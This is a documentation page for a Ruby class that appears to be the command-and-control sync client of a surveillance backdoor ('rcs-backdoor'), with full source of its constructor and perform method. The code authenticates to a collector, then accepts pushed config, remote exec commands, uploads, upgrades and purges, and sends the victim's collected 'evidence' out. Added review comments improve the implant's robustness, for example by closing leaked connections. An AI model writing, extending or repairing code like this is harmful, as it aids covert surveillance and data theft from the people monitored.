Class: RCS::Backdoor::Protocol

Inherits:
Object
  • Object
Includes:
Command, Tracer
Defined in:
lib/rcs-backdoor/protocol.rb

Constant Summary

Constants included from Command

Command::INVALID_COMMAND, Command::PLATFORMS, Command::PROTO_BYE, Command::PROTO_CONF, Command::PROTO_DOWNLOAD, Command::PROTO_EVIDENCE, Command::PROTO_EVIDENCE_CHUNK, Command::PROTO_EVIDENCE_SIZE, Command::PROTO_EXEC, Command::PROTO_FILESYSTEM, Command::PROTO_ID, Command::PROTO_NO, Command::PROTO_OK, Command::PROTO_PURGE, Command::PROTO_UNINSTALL, Command::PROTO_UPGRADE, Command::PROTO_UPLOAD



Methods included from Command

#authenticate, #authenticate_elite, #authenticate_scout, #bye, #normalize, #randblock, #receive_config, #receive_downloads, #receive_exec, #receive_filesystems, #receive_purge, #receive_upgrade, #receive_uploads, #send_command, #send_evidence, #send_evidence_chunk, #send_evidence_size, #send_id

Constructor Details

#initialize(type, sync) ⇒ Protocol

Returns a new instance of Protocol.



# File 'lib/rcs-backdoor/protocol.rb', line 26

# Build a Protocol bound to a transport and a Sync context.
#
# @param type [Symbol] protocol selector: :REST (HTTP) or :RESTS (HTTPS).
#   :ASP and :RSSM are recognised but deliberately refused.
# @param sync [Object] the sync context; #perform reads +sync.backdoor+
#   from it (stored as-is, not validated here).
# @raise [RuntimeError] for :ASP/:RSSM ("You must be kidding... :)") and
#   for any other selector ("Unsupported Protocol").
#
# NOTE(review): :REST rides plain HTTP (Transport.new(:HTTP)). Any
# confidentiality the sync then has comes from the Command-level session
# key produced by #authenticate, not from the transport -- confirm that
# is acceptable before using :REST outside a test setup.
def initialize(type, sync)
  # Supported selectors -> [transport scheme, trace line announcing it].
  supported = {
    :REST  => [:HTTP,  "REST Protocol selected"],
    :RESTS => [:HTTPS, "REST SSL Protocol selected"],
  }

  if supported.key?(type)
    scheme, announce = supported[type]
    trace :debug, announce
    @transport = Transport.new(scheme)
  elsif [:ASP, :RSSM].include?(type)
    # legacy selectors: logged, then refused
    trace :warn, "#{type} Protocol selected..."
    raise "You must be kidding... :)"
  else
    raise "Unsupported Protocol"
  end

  # only reached for a supported selector; a refused one never sets @sync
  @sync = sync
end

Instance Attribute Details

#syncObject

Returns the value of attribute sync.



# File 'lib/rcs-backdoor/protocol.rb', line 24

# The sync context handed to the constructor; #perform reads
# +sync.backdoor+ from it for every Command step.
def sync; @sync; end

#transportObject (readonly)

used by the Command module



# File 'lib/rcs-backdoor/protocol.rb', line 23

# The Transport chosen in the constructor (HTTP or HTTPS); read-only,
# exposed because the mixed-in Command methods send through it.
def transport; @transport; end

Instance Method Details

#perform(host) ⇒ Object



# File 'lib/rcs-backdoor/protocol.rb', line 43

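# Run one complete synchronisation with the collector at +host+.
#
# The steps are the mixed-in Command methods, in protocol order:
# authenticate, send_id, one receive_* step per element the collector
# advertised, the evidence queue, then bye.
#
# NOTE(review): everything after authenticate is driven by the list
# send_id returns from the collector, so a collector that passed the
# handshake can push a new config, exec commands, uploads, an upgrade or
# a purge at the agent. authenticate is the only gate; nothing here
# inspects +available+ beyond membership tests.
#
# @param host [Object] passed straight to Transport#connect_to; its
#   accepted form is defined there, not here
# @return [Object] the value of the final trace call; callers use this
#   method for its side effects
# @raise [StandardError] any error raised by the transport or a protocol
#   step is logged and re-raised; the connection is closed first
def perform(host)
  start = Time.now
  connected = false

  begin
    # connection to the remote host
    @transport.connect_to host
    connected = true

    # --- mixed-in Command functions from here on ---

    # authenticate with the Collector
    # this step will produce the cryptographic session key
    # we can also receive an uninstall command
    authenticate @sync.backdoor

    # send the deviceID, userID, sourceID
    # we will receive the list of elements available on the collector
    available = send_id @sync.backdoor

    # each of these runs only if the collector advertised it
    receive_config @sync.backdoor if available.include? PROTO_CONF
    receive_purge if available.include? PROTO_PURGE
    receive_upgrade if available.include? PROTO_UPGRADE
    receive_uploads if available.include? PROTO_UPLOAD
    receive_exec if available.include? PROTO_EXEC
    receive_downloads if available.include? PROTO_DOWNLOAD
    receive_filesystems if available.include? PROTO_FILESYSTEM

    # send the size of the evidence queue, then the evidence itself
    # (the size is always reported, even when the queue is empty)
    send_evidence_size @sync.backdoor.evidences
    send_evidence @sync.backdoor.evidences unless @sync.backdoor.evidences.empty?

    # terminate the protocol
    bye

    # clean up on the happy path; the ensure below then has nothing to do
    @transport.disconnect
    connected = false

    trace :warn, "Total Time is #{Time.now - start} sec"
  rescue StandardError => detail
    # log-and-rethrow only; StandardError instead of Exception so that
    # Interrupt/SystemExit/NoMemoryError are not routed through trace
    trace :fatal, "ERROR: #{detail}"
    raise
  ensure
    # Reached with connected == true only when a step above raised after
    # connect_to succeeded: previously the socket was simply leaked.
    # A failing disconnect must not replace the exception in flight.
    if connected
      begin
        @transport.disconnect
      rescue StandardError => cleanup_error
        trace :warn, "disconnect failed: #{cleanup_error}"
      end
    end
  end
end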